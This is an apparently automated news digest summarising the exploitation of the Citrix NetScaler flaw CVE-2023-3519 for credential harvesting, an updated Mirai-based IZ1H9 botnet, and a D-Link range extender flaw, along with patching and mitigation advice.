October 10, 2023 at 02:18AM
Threat actors are exploiting a critical flaw in Citrix NetScaler ADC and Gateway devices to conduct a credential harvesting campaign. The flaw, CVE-2023-3519, allows for remote code execution. Attackers are inserting a malicious script into the authentication web page and capturing user credentials. IBM X-Force has identified at least 600 unique victim IP addresses affected by the campaign. Additionally, Fortinet FortiGuard Labs discovered an updated version of the IZ1H9 Mirai-based DDoS campaign targeting IP cameras and routers using various exploits. Organizations are urged to promptly apply patches and change default login credentials for devices.
Key takeaways from the meeting notes:
1. There is a critical flaw in Citrix NetScaler ADC and Gateway devices that threat actors are exploiting to conduct a credential harvesting campaign.
2. The flaw, known as CVE-2023-3519, allows for code injection and can lead to unauthenticated remote code execution.
3. IBM X-Force discovered the activity and found that attackers are using the flaw to insert a malicious script into the authentication web page and capture user credentials.
4. The attackers are leveraging a PHP-based web shell to gain access to the NetScaler Gateway login page and modify it to collect username and password information.
5. Over 600 unique victim IP addresses hosting modified NetScaler Gateway login pages have been identified, mainly in the U.S. and Europe.
6. The campaign has been ongoing for nearly two months, with the earliest login page modification dated August 11, 2023.
7. The attacks have not been attributed to any known threat actor or group.
8. Fortinet FortiGuard Labs has discovered an updated version of the IZ1H9 Mirai-based DDoS campaign, which targets vulnerabilities in IP cameras and routers from various manufacturers.
9. The campaign exploits recently released exploit code for various CVEs to infect vulnerable devices and expand its botnet for brute-force and DDoS attacks.
10. Organizations are strongly advised to apply patches promptly, change default login credentials for devices, and implement appropriate mitigations against volumetric DDoS attacks.
11. There is also an unpatched remote command injection flaw affecting the D-Link DAP-X1860 range extender (CVE-2023-45208) that allows threat actors to run shell commands during the setup process.
12. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an advisory highlighting the risk of volumetric DDoS attacks and urging organizations to implement mitigations.
Full Article – https://ift.tt/5Vd1Suq